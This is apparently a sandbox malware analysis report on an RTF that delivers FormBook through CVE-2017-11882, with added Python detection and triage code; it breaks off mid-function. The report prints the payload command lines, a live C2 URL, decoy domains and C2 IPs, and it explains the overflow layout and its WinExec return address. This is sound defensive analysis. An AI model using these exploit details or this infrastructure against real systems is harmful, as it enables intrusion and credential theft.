Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
Analysis ID: 680528
MD5: 8bfea104ae681494896379e3c647f6ae
SHA1: aaf97d8a987c5060ff06c4031030000d53d3cb31
SHA256: 2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
Tags: rtf

Detection

Detection: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Document contains OLE streams with names of living off the land binaries
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
PE file contains section with special chars
Sample uses process hollowing technique
Office process drops PE file
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3000 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 3060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2708 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 316 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: B4F00BB75BFD5C4E2C9D0CD6070E8E54)
        • notepad.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • ipconfig.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
              • cmd.exe (PID: 1740 cmdline: /c del "C:\Windows\SysWOW64\notepad.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

FormBook: {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}
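
The tree above is the chain a detection engineer wants to alert on: EQNEDT32.EXE, which never legitimately spawns anything, starts cmd.exe; cmd.exe runs a dropped executable from %tmp%; that executable starts notepad.exe with a dllhost-style /Processid:{GUID} argument (the hollowed host); explorer.exe, listed as a child of notepad.exe because it is the injection target, starts ipconfig.exe, which in turn runs cmd.exe /c del against C:\Windows\SysWOW64\notepad.exe. The Python below is an added example written for this page, not a Joe Sandbox signature: it rebuilds the tree from events transcribed from the list above and applies a small rule set to it. The rule names are this example's own; the image path of the second cmd.exe (assumed to be the same SysWOW64 binary as the first, since the MD5s match) and the use of None for the unknown parents of WINWORD.EXE and EQNEDT32.EXE are assumptions.

```python
"""Flag parent/child anomalies in the process tree above.

Added example for this report, not a Joe Sandbox signature. EVENTS is
transcribed from the process tree as (pid, ppid, image, command line); the
rule set is a minimal one chosen for this chain.
"""
import ntpath
import re

# WINWORD.EXE and EQNEDT32.EXE are top-level in the report (parent not shown), so ppid is None.
# explorer.exe (PID 1860) is the already-running shell; the sandbox lists injection targets as
# children of the injecting process. The image path of PID 1740 is assumed to be the same
# SysWOW64\cmd.exe as PID 2708 (identical MD5 in the tree).
EVENTS = [
    (3000, None, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'),
    (3060, None, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    (2708, 3060, r"C:\Windows\SysWOW64\cmd.exe", r"CmD.exe /C %tmp%\Client.exe A C"),
    (316, 2708, r"C:\Users\user\AppData\Local\Temp\Client.exe",
     r"C:\Users\user\AppData\Local\Temp\Client.exe A C"),
    (2188, 316, r"C:\Windows\SysWOW64\notepad.exe",
     r"C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}"),
    (1860, 2188, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    (1800, 1860, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
    (1740, 1800, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Windows\SysWOW64\notepad.exe"'),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NO_CHILDREN = {"eqnedt32.exe", "ipconfig.exe"}   # utilities that never legitimately spawn processes


def base(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(events, pid) -> list:
    """Image names from the root of the chain down to pid."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(base(by_pid[pid][2]))
        pid = by_pid[pid][1]
    return chain[::-1]


def analyze(events) -> list:
    """Return (pid, rule, detail) tuples for every rule each event trips."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, image, cmdline in events:
        name = base(image)
        parent = base(by_pid[ppid][2]) if ppid in by_pid else None
        if parent in NO_CHILDREN:
            findings.append((pid, "no-child-utility-spawned", f"{parent} started {name}"))
        if parent in OFFICE and name in SHELLS:
            findings.append((pid, "office-spawns-shell", f"{parent} -> {cmdline}"))
        if re.search(r"\\AppData\\Local\\Temp\\", image, re.IGNORECASE):
            findings.append((pid, "exec-from-temp", image))
        if name == "notepad.exe" and "/processid:" in cmdline.lower():
            # dllhost.exe takes /Processid:{CLSID}; notepad.exe does not, so this is a spoofed line
            findings.append((pid, "surrogate-style-cmdline", cmdline))
        if name == "cmd.exe" and re.search(r"\bdel\b.*\\Windows\\", cmdline, re.IGNORECASE):
            findings.append((pid, "deletes-windows-binary", cmdline))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyze(EVENTS):
        print(f"{pid:>5} {rule:<28} {detail}")
    print(" -> ".join(ancestry(EVENTS, 1740)))
```

Run stand-alone it prints one line per finding and the full ancestry of the final cmd.exe, which walks back to EQNEDT32.EXE; in a real pipeline the same rules run over Sysmon event 1 or EDR process-creation records.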
Yara matches on the submitted file

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
Rule: MAL_RTF_Embedded_OLE_PE (author: Florian Roth)
Description: Detects a suspicious string often used in PE files in a hex encoded object stream
Strings:
  • 0x1799:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465 (hex-encoded "This program cannot be run in DOS mode")
  • 0x16fd:$m1: 4d5a90000300000004000000ffff (hex-encoded MZ header)

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
Rule: INDICATOR_RTF_MalVer_Objects (author: ditekSHen)
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Strings:
  • 0x1283:$obj2: \objdata
  • 0x1dc298:$obj2: \objdata
  • 0x2bc8ae:$obj3: \objupdate
  • 0x8e8:$obj4: \objemb
  • 0x1db8fd:$obj4: \objemb
Yara matches on the dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp
Rule: rtf_cve2017_11882_ole (author: John Davison)
Description: Attempts to identify the exploit CVE 2017 11882
Strings:
  • 0xebc00:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xebc21:$font: 0A 01 08 5A 5A
  • 0xebc52:$winexec: 12 0C 43 00

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp
Rule: EXP_potential_CVE_2017_11882 (author: ReversingLabs)
Description: unknown
Strings:
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xebb00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xebc29:$exe: .exe
  • 0xebc3d:$exe: .exe
  • 0xebc52:$address: 12 0C 43 00
Yara matches on memory dumps

Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook (author: Joe Security)
Description: Yara detected FormBook

Rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
Description: unknown
Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Rule: Formbook_1 (author: Felix Bilstein - yara-signator at cocacoding dot com)
Description: autogenerated rule brought to you by yara-signator
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Rule: Formbook (author: JPCERT/CC Incident Response Group)
Description: detect Formbook in memory
Strings:
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook (author: Joe Security)
Description: Yara detected FormBook

(54 further memory dump matches not shown)
Yara matches on unpacked PEs

Source: 9.0.notepad.exe.400000.3.raw.unpack
Rule: JoeSecurity_FormBook (author: Joe Security)
Description: Yara detected FormBook

Rule: Windows_Trojan_Formbook_1112e116 (author: unknown)
Description: unknown
Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Rule: Formbook_1 (author: Felix Bilstein - yara-signator at cocacoding dot com)
Description: autogenerated rule brought to you by yara-signator
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Rule: Formbook (author: JPCERT/CC Incident Response Group)
Description: detect Formbook in memory
Strings:
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 9.0.notepad.exe.400000.0.unpack
Rule: JoeSecurity_FormBook (author: Joe Security)
Description: Yara detected FormBook

(47 further unpacked PE matches not shown)
          No Sigma rule has matched
Snort IDS alerts

Timestamp: 08/08/22-18:39:45.738853
SID: 2031449 (ET TROJAN FormBook CnC Checkin (GET))
Source IP: 192.168.2.22
Destination IP: 66.235.200.170
Source Port: 49171
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:40:04.832440
SID: 2031449 (ET TROJAN FormBook CnC Checkin (GET))
Source IP: 192.168.2.22
Destination IP: 104.167.67.175
Source Port: 49172
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:39:45.738853
SID: 2031453 (ET TROJAN FormBook CnC Checkin (GET))
Source IP: 192.168.2.22
Destination IP: 66.235.200.170
Source Port: 49171
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:40:04.832440
SID: 2031453 (ET TROJAN FormBook CnC Checkin (GET))
Source IP: 192.168.2.22
Destination IP: 104.167.67.175
Source Port: 49172
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:39:45.738853
SID: 2031412 (ET TROJAN FormBook CnC Checkin (GET))
Source IP: 192.168.2.22
Destination IP: 66.235.200.170
Source Port: 49171
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-18:40:04.832440
SID: 2031412 (ET TROJAN FormBook CnC Checkin (GET))
Source IP: 192.168.2.22
Destination IP: 104.167.67.175
Source Port: 49172
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: www.lundadonate.xyz/nb30/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | Virustotal: Detection: 43%
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | ReversingLabs: Detection: 21%
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Client.exe | ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Joe Sandbox ML: detected
Source: 9.0.notepad.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

          Exploits

Source: Static RTF information | Object: 1 Offset: 001DC2BCh
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr | Stream path '_1721489049/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ipconfig.pdb | source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbN | source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdb | source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: notepad.pdbx | source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
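
The Yara strings on the dropped ~WRF file locate the Equation Editor payload precisely: $headers (the 28-byte EQNOLEFILEHDR followed by the MTEF header 03 01 01 03 0A) at 0xebc00, $font (a FONT record: tag 08, tface and style 5A 5A) at 0xebc21, the two ".exe" hits of the command line at 0xebc29 and 0xebc3d, and $winexec / $address 12 0C 43 00 at 0xebc52, which is exactly 44 bytes past the start of the font name. That is the classic CVE-2017-11882 layout: an overlong FONT name overruns the fixed stack buffer in EQNEDT32.EXE and the saved return address is replaced with 0x00430C12, the location that hands the string to WinExec, which is how a command line of "CmD.exe /C %tmp%\Client.exe A C" ends up being run by the Equation Editor. The Python below is an added example written for this page, not Joe Sandbox code: it decodes the \objdata hex of an RTF and applies those checks. The RTF it scans is constructed for the test, with the hex interleaved with \par control words the way obfuscated samples do it; it is not a valid compound file and carries only the byte patterns the scanner inspects. The 36-byte buffer size and the minimal MTEF record walk are assumptions stated in the comments.

```python
"""Static triage of an RTF for an embedded Equation Editor object (CVE-2017-11882).

Added example for this report, not Joe Sandbox code. It reproduces the checks
behind the Yara hits above: decode the hex under \\objdata, look for the
compound-file magic, the "Equation Native" stream name, the MTEF header
(tail of $headers), an oversized FONT record name, and the 0x00430C12 return
address ($winexec / $address). build_sample_rtf() is constructed for the test:
not a valid compound file, only the byte patterns the scanner inspects, with
the hex split by \\par control words the way obfuscated samples do it.
"""
import re
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # $docfilemagic
MTEF_HDR = b"\x03\x01\x01\x03\x0a"                # MTEF v3 header, the tail of $headers
WINEXEC_RET = b"\x12\x0c\x43\x00"                 # 0x00430C12 little-endian, $winexec / $address
FONT_NAME_BUF = 0x24   # assumption: size of the stack buffer the FONT name is copied into


def rtf_flags(rtf: bytes) -> dict:
    """Header version and object control words that INDICATOR_RTF_MalVer_Objects keys on."""
    m = re.match(rb"\{\\rtf(\d*)", rtf)
    return {
        "rtf_version": m.group(1).decode() if m else None,  # "1" is the only standard value
        "objemb": rb"\objemb" in rtf,
        "objupdate": rb"\objupdate" in rtf,  # loads the object without any user interaction
        "objdata_count": len(re.findall(rb"\\objdata\b", rtf)),
    }


def objdata_blobs(rtf: bytes) -> list:
    """Decode the hex payload of every \\objdata group, ignoring interleaved control words."""
    blobs = []
    for m in re.finditer(rb"\\objdata\b", rtf):
        depth, i, body = 0, m.end(), bytearray()
        while i < len(rtf):
            c = rtf[i]
            if c == 0x7B:            # '{' opens a nested group
                depth += 1
            elif c == 0x7D:          # '}' at depth 0 closes the objdata group
                if depth == 0:
                    break
                depth -= 1
            else:
                body.append(c)
            i += 1
        # strip control words first (their letters would otherwise pass as hex), then non-hex
        hexdigits = re.sub(rb"\\[A-Za-z]+-?\d*|[^0-9A-Fa-f]", b"", bytes(body))
        blobs.append(bytes.fromhex(hexdigits[: len(hexdigits) & ~1].decode()))
    return blobs


def scan_equation_object(blob: bytes) -> dict:
    """Find the Equation Native payload and walk the MTEF records to the FONT name."""
    res = {
        "cfb_magic": blob.startswith(CFB_MAGIC),
        "equation_native": b"Equation Native" in blob,
        "mtef_header": False,
        "font_name": b"",
        "font_name_len": 0,
        "winexec_ret": WINEXEC_RET in blob,
    }
    pos = blob.find(MTEF_HDR)
    if pos < 0:
        return res
    res["mtef_header"] = True
    i = pos + len(MTEF_HDR)
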